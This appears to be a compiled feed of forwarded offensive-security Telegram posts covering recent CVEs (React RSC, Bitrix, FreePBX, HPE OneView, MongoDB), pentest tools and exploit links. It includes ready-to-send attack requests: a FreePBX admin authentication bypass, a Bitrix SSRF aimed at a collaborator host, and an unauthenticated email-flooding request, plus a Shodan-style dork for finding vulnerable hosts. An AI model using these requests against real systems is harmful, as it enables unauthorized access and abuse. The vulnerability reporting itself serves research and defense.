Forwarded from AD_POHEQUE
апдейт по React-RCE.
списался с несколькими своими коллегами, кто тоже ковыряет эту историю. да, нас всех конкретно сбила с толку публичная демка.
но важно другое.
сам автор уязвимости / эксплойта прямым текстом сказал:
то, что сейчас гуляет по паблику — шляпа.
https://react2shell.com/
мы пошли по ложному следу.
нормальный рабочий вектор — есть, надо стараться жёстче.
по факту у нас что есть:
- десериализация
- модель угроз для RSC остаётся очень жирной
- просто путь эксплуатации явно сложнее, чем “запусти vm.runInThisContext и внедри команду”
сейчас я пойду прогуляюсь, подышу прекрасным московским воздухом,
потом закрою пару важных дел по основной движухе
и этой же ночью продолжу копать реальный вектор.
отдельно спасибо всем, кто отозвался.
проснуться к вечеру, увидеть плюс к подписчикам и корректную обратную связь — это кайф.
дальше контента будет больше: тут в основном внутрянка, AD, Red Team, оффенсив, всё как вы любите.
и да, RCE-класс уязвимости в таком звере, как React, — это жирный таргет для всех:
внутрянщиков, веберов, мобилщиков, аппсек спецов.
если оно там есть — это уже архитектурная история, а не просто “ещё один баг”.
ну и главное, что ещё раз всплыло за эту ночь:
когда реально ресёрчишь, тебя будет качать.
то “всё фейк”, то “это абсурд”, то “я вообще не туда смотрю”.
нормально.
главное — не терять голову и не терять веру в то, что ты докопаешься до сути.
остальное — шум.
👾
списался с несколькими своими коллегами, кто тоже ковыряет эту историю. да, нас всех конкретно сбила с толку публичная демка.
но важно другое.
сам автор уязвимости / эксплойта прямым текстом сказал:
то, что сейчас гуляет по паблику — шляпа.
https://react2shell.com/
мы пошли по ложному следу.
нормальный рабочий вектор — есть, надо стараться жёстче.
по факту у нас что есть:
- десериализация
- модель угроз для RSC остаётся очень жирной
- просто путь эксплуатации явно сложнее, чем “запусти vm.runInThisContext и внедри команду”
сейчас я пойду прогуляюсь, подышу прекрасным московским воздухом,
потом закрою пару важных дел по основной движухе
и этой же ночью продолжу копать реальный вектор.
отдельно спасибо всем, кто отозвался.
проснуться к вечеру, увидеть плюс к подписчикам и корректную обратную связь — это кайф.
дальше контента будет больше: тут в основном внутрянка, AD, Red Team, оффенсив, всё как вы любите.
и да, RCE-класс уязвимости в таком звере, как React, — это жирный таргет для всех:
внутрянщиков, веберов, мобилщиков, аппсек спецов.
если оно там есть — это уже архитектурная история, а не просто “ещё один баг”.
ну и главное, что ещё раз всплыло за эту ночь:
когда реально ресёрчишь, тебя будет качать.
то “всё фейк”, то “это абсурд”, то “я вообще не туда смотрю”.
нормально.
главное — не терять голову и не терять веру в то, что ты докопаешься до сути.
остальное — шум.
👾
Telegram
AD_POHEQUE
Будь тем, чем другие не были.
https://boosty.to/ghe770mvp
https://boosty.to/ghe770mvp
Forwarded from #bugbountytips
This media is not supported in your browser
VIEW IN TELEGRAM
Cloudflare has recently started blocking proxy tools such as Burp Suite by detecting their unique TLS and request fingerprints.
If you encounter this issue, install the "Bypass Bot Detection" extension from the BApp Store. It spoofs Burp’s TLS fingerprint to resemble normal browser traffic and bypass the block.
https://github.com/PortSwigger/bypass-bot-detection
#bugbountytips
If you encounter this issue, install the "Bypass Bot Detection" extension from the BApp Store. It spoofs Burp’s TLS fingerprint to resemble normal browser traffic and bypass the block.
https://github.com/PortSwigger/bypass-bot-detection
#bugbountytips
👍4
Forwarded from SHADOW:Group
Проснулся, а тут RCE в React Server Functions с одного запроса уже выполняется. Жаркие споры вчера не прошли напрасно.
https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3
https://github.com/msanft/CVE-2025-55182
#web #rce #react
https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3
https://github.com/msanft/CVE-2025-55182
#web #rce #react
Forwarded from wr3dmast3r vs pentest
Данный материал подготовлен мной совместно с моим учеником для всех, кто пытается начать свой путь в области безопасности веб-приложений ☺️
На мой взгляд, PortSwigger является фаворитом среди всех обучающих материалов по информационной безопасности, и мне бы хотелось, чтобы вы в первую очередь пользовались именно бесплатными источниками знаний, а не платили за сомнительные курсы. Тем более, что большинство курсов на русском языке и так заимствуют значительную часть материалов, представленных здесь🤓
Дальнейшее развитие репозитория возможно с вашей помощью: каждый из вас может внести вклад, добавляя решения лабораторных работ. Со своей стороны я буду по мере сил пополнять разделы, и вместе мы сделаем вход в изучение веб-безопасности бесплатным и доступным для каждого🎧
Подробнее
На мой взгляд, PortSwigger является фаворитом среди всех обучающих материалов по информационной безопасности, и мне бы хотелось, чтобы вы в первую очередь пользовались именно бесплатными источниками знаний, а не платили за сомнительные курсы. Тем более, что большинство курсов на русском языке и так заимствуют значительную часть материалов, представленных здесь
Дальнейшее развитие репозитория возможно с вашей помощью: каждый из вас может внести вклад, добавляя решения лабораторных работ. Со своей стороны я буду по мере сил пополнять разделы, и вместе мы сделаем вход в изучение веб-безопасности бесплатным и доступным для каждого
Подробнее
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5
Forwarded from Заметки склерозного вебера (ArroizX)
Баги и фичи ASP.NET и IIS’a 2.0
Скоро новый год и праздники, а это значит, что после загруженных недель будет достаточно времени, чтобы изучить для себя что-то новенькое!
Поэтому в этом посте я решил собрать для вас свои заметки/ссылки по багам и фичам ASP.NET и IIS’a. Да-да, я уже постил запись и презентацию своего доклада по этой же теме 2 апреля, но там я много всего не рассказал из-за временных рамок, так что советую ознакомиться с этой полной версией;)
P.S. Рекомендую читать статьи Soroush Dalili в веб-архиве, а то после обновления дизайна сайта некоторые статьи пошли по одному месту=)
А теперь переходим к материалу:
1) Как понять, что перед тобой IIS/ASP.NET
1.1) HTTP-заголовки:
1.2) Ошибки: Ошибка_IIS, ошибка_ASP.NET
2) Что делать с заголовком
Появляется из-за того, что указано невалидное значение в HTTP-заголовке Host. Поэтому стоит подобрать валидное значение(Перебрать поддомен/домен, попробовать внутренние адреса)
3) Раскрытие локального IP-адреса: [1], [2]
4) Раскрытие инфы о хосте через NTLM аутентификацию
5) Cookieless session
5.1) XSS через ResolveUrl
5.2) CVE-2023-36899 и CVE-2023-36560
5.3) Раскрытие исходного кода
6) IIS Tilde Enumeration: [1], [2], [3]
7) File upload vulnerabilities
7.1) web.config: [1], [2]
7.2) XAMLX
7.3) php под IIS
7.4) Точка с запятой и двоеточие: [1], [2], [3]
7.5) Windows 8.3 feature (можно загрузить файл с SNF именем)
7.6) RESX
7.7) Stored XSS через необычные форматы
8) Deserialization вектора
8.1) ViewState: [1], [2]
8.2) .NET Remoting
9) Waf Bypass (x-up-devcap-post-charset)
10) HTTP Request Smuggling 2025
11) 107 Hacking IIS and NET Kevin Miller
Скоро новый год и праздники, а это значит, что после загруженных недель будет достаточно времени, чтобы изучить для себя что-то новенькое!
Поэтому в этом посте я решил собрать для вас свои заметки/ссылки по багам и фичам ASP.NET и IIS’a. Да-да, я уже постил запись и презентацию своего доклада по этой же теме 2 апреля, но там я много всего не рассказал из-за временных рамок, так что советую ознакомиться с этой полной версией;)
P.S. Рекомендую читать статьи Soroush Dalili в веб-архиве, а то после обновления дизайна сайта некоторые статьи пошли по одному месту=)
А теперь переходим к материалу:
1) Как понять, что перед тобой IIS/ASP.NET
1.1) HTTP-заголовки:
Server: Microsoft-IIS/X – веб-сервер и его версия
X-Powered-By: ASP.NET – технология на backend’е
X-AspNet-Version: X – версия ASP.NET
Microsoft-HTTPAPI/X – компонент Windows для обработки HTTP-запросов без полноценного IIS
1.2) Ошибки: Ошибка_IIS, ошибка_ASP.NET
2) Что делать с заголовком
Microsoft-HTTPAPI/2.0:Появляется из-за того, что указано невалидное значение в HTTP-заголовке Host. Поэтому стоит подобрать валидное значение(Перебрать поддомен/домен, попробовать внутренние адреса)
3) Раскрытие локального IP-адреса: [1], [2]
4) Раскрытие инфы о хосте через NTLM аутентификацию
5) Cookieless session
5.1) XSS через ResolveUrl
5.2) CVE-2023-36899 и CVE-2023-36560
5.3) Раскрытие исходного кода
6) IIS Tilde Enumeration: [1], [2], [3]
7) File upload vulnerabilities
7.1) web.config: [1], [2]
7.2) XAMLX
7.3) php под IIS
7.4) Точка с запятой и двоеточие: [1], [2], [3]
7.5) Windows 8.3 feature (можно загрузить файл с SNF именем)
7.6) RESX
7.7) Stored XSS через необычные форматы
8) Deserialization вектора
8.1) ViewState: [1], [2]
8.2) .NET Remoting
9) Waf Bypass (x-up-devcap-post-charset)
10) HTTP Request Smuggling 2025
11) 107 Hacking IIS and NET Kevin Miller
🔥3
Forwarded from Ralf Hacker Channel (Ralf Hacker)
А это очень круто... это как bloodyAD, только в BOF'ах 😳
https://github.com/P0142/LDAP-Bof-Collection
#redteam #pentest #soft #git #ad
https://github.com/P0142/LDAP-Bof-Collection
#redteam #pentest #soft #git #ad
❤1
Forwarded from Pentest Notes
1C-Bitrix <= 25.100.500 (Translate Module) Remote Code Execution Vulnerability (CVE-2025-67887) 🥤
Исследователь слил RCE PoC под плагин в Битрикс через 3 дня после присвоения CVE, не дождавшись ответа вендора. Патча нет...
Vulnerability discovered by Egidio Romano.
Уязвимые версии:
Версия 25.100.500 и более ранние версии.
Описание уязвимости:
Уязвимость находится в «Translate Module», который позволяет пользователям загружать и распаковывать архивные файлы во временную папку. Однако приложение не проверяет должным образом содержимое этих архивов перед их распаковкой. Злоумышленники могут использовать эту уязвимость для загрузки и выполнения произвольного PHP-кода, включив в архив PHP-файл вместе со специально созданным файлом .htaccess.
Что делать:
1. Проверить в логах наличие обращений к
/bitrix/services/main/ajax.php?action=translate.asset.grabber.extract
и
/bitrix/services/main/ajax.php?action=translate.asset.grabber.apply
2. Проверить директории с файлами на наличие закладок и подозрительных архивов.
3. По возможности ограничить доступ к этим эндпоинтам (проверить привилегии) или временно отключить модуль, ждать патч🤷♀️
CVE-2025-67887
💫 @pentestnotes
Исследователь слил RCE PoC под плагин в Битрикс через 3 дня после присвоения CVE, не дождавшись ответа вендора. Патча нет...
Vulnerability discovered by Egidio Romano.
Уязвимые версии:
Версия 25.100.500 и более ранние версии.
Описание уязвимости:
Уязвимость находится в «Translate Module», который позволяет пользователям загружать и распаковывать архивные файлы во временную папку. Однако приложение не проверяет должным образом содержимое этих архивов перед их распаковкой. Злоумышленники могут использовать эту уязвимость для загрузки и выполнения произвольного PHP-кода, включив в архив PHP-файл вместе со специально созданным файлом .htaccess.
Что делать:
1. Проверить в логах наличие обращений к
/bitrix/services/main/ajax.php?action=translate.asset.grabber.extract
и
/bitrix/services/main/ajax.php?action=translate.asset.grabber.apply
2. Проверить директории с файлами на наличие закладок и подозрительных архивов.
3. По возможности ограничить доступ к этим эндпоинтам (проверить привилегии) или временно отключить модуль, ждать патч
CVE-2025-67887
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Похек
CVE-2025-66039 (CVSS 9.3) — обход аутентификации в FreePBX Endpoint Manager
#CVE #FreePBX #AuthBypass #PHP
В модуле Endpoint Manager обнаружилась логическая ошибка при обработке аутентификации, позволяющая получить админа без пароля. Система некорректно верифицирует входящие запросы если в настройках выбран тип аутентификации webserver.
ℹ️ Техническая суть
Когда FreePBX настроен с
Пример уязвимого запроса:
❗️ Защита
Обновить модуль Endpoint Manager до версий 16.0.44 / 17.0.23 или выше или, как временная мера, отключить webserver, если он не требуется.
🪲 Инструменты для детекта (nuclei правило чекает просто версию)
🌚 @poxek | 📲 MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK | ❤️ Мерч
#CVE #FreePBX #AuthBypass #PHP
В модуле Endpoint Manager обнаружилась логическая ошибка при обработке аутентификации, позволяющая получить админа без пароля. Система некорректно верифицирует входящие запросы если в настройках выбран тип аутентификации webserver.
Когда FreePBX настроен с
AUTHTYPE=webserver, система слепо доверяет заголовку Authorization: Basic — достаточно указать валидное имя пользователя (например, admin) с любым паролем.Пример уязвимого запроса:
GET /admin/config.php?display=epm_advanced&view=settings HTTP/1.1
Host: target-freepbx.com
User-Agent: Mozilla/5.0...
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Connection: close
Обновить модуль Endpoint Manager до версий 16.0.44 / 17.0.23 или выше или, как временная мера, отключить webserver, если он не требуется.
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Заметки склерозного вебера (ArroizX)
Решил сделать последний в этом году пост про наш любимый битрикс:
Авторизированная SSRF в Битрикс24 через интеграцию с MS Sharepoint
В Битрикс24 существует возможность интеграции с MS Sharepoint для синхронизации различных списков: клиенты, календарь и пр. Подробнее про это можете прочитать ТУТ.
Нас же интересует здесь то, что мы можем использовать данную функциональность для SSRF-атак, главное - это иметь любую валидную учётку:
Возможно данная функциональность может встретиться и в обычном битриксе, но это я оставляю на проверку вам:D
Неавторизированный спам электронными письмами через sender_sub_confirm.php
Можно захламить любой почтовый ящик письмами о подтверждении подписки, причём для этого не нужно иметь УЗ битрикс:
На ББ вряд-ли примут, но как бага для проекта - самое то.
P.S. @FaLLenSkiLL если ты будешь добавлять это в свой Bitrix Ultimate Pentest Guide, докинь пж SSRF через
Авторизированная SSRF в Битрикс24 через интеграцию с MS Sharepoint
В Битрикс24 существует возможность интеграции с MS Sharepoint для синхронизации различных списков: клиенты, календарь и пр. Подробнее про это можете прочитать ТУТ.
Нас же интересует здесь то, что мы можем использовать данную функциональность для SSRF-атак, главное - это иметь любую валидную учётку:
GET /bitrix/components/bitrix/sharepoint.link/ajax.php?mode=test&sp_server=http://collaborator&sp_user=&sp_pass=&sessid=... HTTP/1.1
Host: bitrix24
Cookie: ...
Bx-Ajax: true
Возможно данная функциональность может встретиться и в обычном битриксе, но это я оставляю на проверку вам:D
Неавторизированный спам электронными письмами через sender_sub_confirm.php
Можно захламить любой почтовый ящик письмами о подтверждении подписки, причём для этого не нужно иметь УЗ битрикс:
POST /bitrix/tools/sender_sub_confirm.php HTTP/1.1
Host: bitrix
Cookie: ...
Content-Type: application/x-www-form-urlencoded
Content-Length: x
sessid=...&sender_subscription=add&SENDER_SUBSCRIBE_EMAIL=some@some.com
На ББ вряд-ли примут, но как бага для проекта - самое то.
P.S. @FaLLenSkiLL если ты будешь добавлять это в свой Bitrix Ultimate Pentest Guide, докинь пж SSRF через
/bitrix/components/bitrix/main.urlpreview/ajax.php и /bitrix/tools/html_editor_action.php, а то лень каждый раз ползти в PDFку отдельно и копировать запрос=)Forwarded from 1N73LL1G3NC3
CVE-2025-37164: Unauthenticated RCE in HPE OneView.
Unauthenticated RCE (10.0 CVSS) vulnerability, in Hewlett Packard Enterprise (HPE) OneView via an unauthenticated REST endpoint called executeCommand. All versions below 11.00 are vulnerable (so long as the vendor supplied hotfix has not been applied), however some VM product versions do not enable the vulnerable "ID Pools" endpoint, and are not exploitable.
Blog: https://attackerkb.com/topics/ixWdbDvjwX/cve-2025-37164/rapid7-analysis
ZoomEye Dork: app="HPE OneView"
Unauthenticated RCE (10.0 CVSS) vulnerability, in Hewlett Packard Enterprise (HPE) OneView via an unauthenticated REST endpoint called executeCommand. All versions below 11.00 are vulnerable (so long as the vendor supplied hotfix has not been applied), however some VM product versions do not enable the vulnerable "ID Pools" endpoint, and are not exploitable.
Blog: https://attackerkb.com/topics/ixWdbDvjwX/cve-2025-37164/rapid7-analysis
ZoomEye Dork: app="HPE OneView"
P.S. When testing HPE OneView version 6.60, you can elevate to root by exploiting CVE-2021-4034. It's unknown if that will work against more recent OneView appliance versions.
👍1
А вы замечали, что при установке
Так вот, если нажать на кнопку и скачать официальную версию с сайта portswigger, а затем заменить её на текущую, то вы поставите новый бурп.
Наверное, поэтому сейчас так редко выходят новости о новой версии бурпа — лоадер позволяет на лету их обновлять. Всё, что останется сделать — скопировать команду из поля Loader command, сохранить её в файл, дать ей
chmod +x <command>
и скинуть её куда-нибудь в PATH (к примеру, в /bin).
Работает как при свежей установке бурпа, так и при его обновлении!
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯5😁2
Forwarded from Freedom Fox 🏴☠
This media is not supported in your browser
VIEW IN TELEGRAM
#0Day утечка Net‑NTLMv2 хеша через Microsoft Photos (ms-photos URI) в один клик. Microsoft Photos принимает параметр
https://github.com/rubenformation/ms-photos_NTLM_Leak
Видео: https://youtu.be/e-lM_vP6HwQ?si=-_vwV3Dzt88PQXG3
Telegram✉️ @freedomfox
fileName=\\UNC\path в URI-схеме ms-photos:. Microsoft баг не признала, CVE нет.https://github.com/rubenformation/ms-photos_NTLM_Leak
Видео: https://youtu.be/e-lM_vP6HwQ?si=-_vwV3Dzt88PQXG3
Telegram
Please open Telegram to view this post
VIEW IN TELEGRAM
(обновлений не было 9 месяцев)
🔗 Ссылка — скоро раскатают на pipx и kali-репозитории
Самые приятные изменения:
💠 Новый модуль для смены пароля пользователю💠 Модуль enable_cmdshell для mssql💠 Возможность дампа LSA/SAM через MSSQL💠 Долгожданный фикс проблемы парсинга кириллицы в LDAP (теперь доступен глобально без необходимости устанавливать форк)💠 Новый модуль - eventlog_creds, позволяющий искать учетки в event log'е (при наличии process creation auditing)💠 Новый модуль Badsuccessor💠 Теперь по умолчанию доступен коллектор Bloodhound Community Edition (сменить его обратно на legacy можно в конфиге)💠 Новый модуль - AWS Credentials Finder💠 Атаку Kerberoasting теперь возможно выполнять по отношению к учётным записям с включенным pre-authentication💠 В модуль lsassy завезли поддержку дампа kerberos-билетов💠 Возможность исполнения команд через RDP!!!!💠 Модуль для проверки уязвимости NTLM Reflection (patch-based)💠 Возможность kerberoasting'а определенных пользователей и компьютеров💠 Новый модуль — raisechild для повышения привилегий в cross-forest взаимодействии💠 Множество правок доступных раннее модулей
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Brut Security 2.0
SmuggleX v0.1.0 🚀
⚡️smugglex <TARGET> <FLAGS>
🔆 <TARGETS> | smugglex
🏷️Rust-powered HTTP Request Smuggling Scanner.
⭐️ Github: github.com/hahwul/smugglex
⚡️smugglex <TARGET> <FLAGS>
🔆 <TARGETS> | smugglex
🏷️Rust-powered HTTP Request Smuggling Scanner.
⭐️ Github: github.com/hahwul/smugglex
👍2
Forwarded from Brut Security 2.0
MongoBleed (CVE-2025-14847) - Unauthenticated Memory Leak PoC
https://github.com/joe-desimone/mongobleed
By @dez
#bugbountytips #bugbounty #cybersecurity
https://github.com/joe-desimone/mongobleed
By @dez
#bugbountytips #bugbounty #cybersecurity
🔥3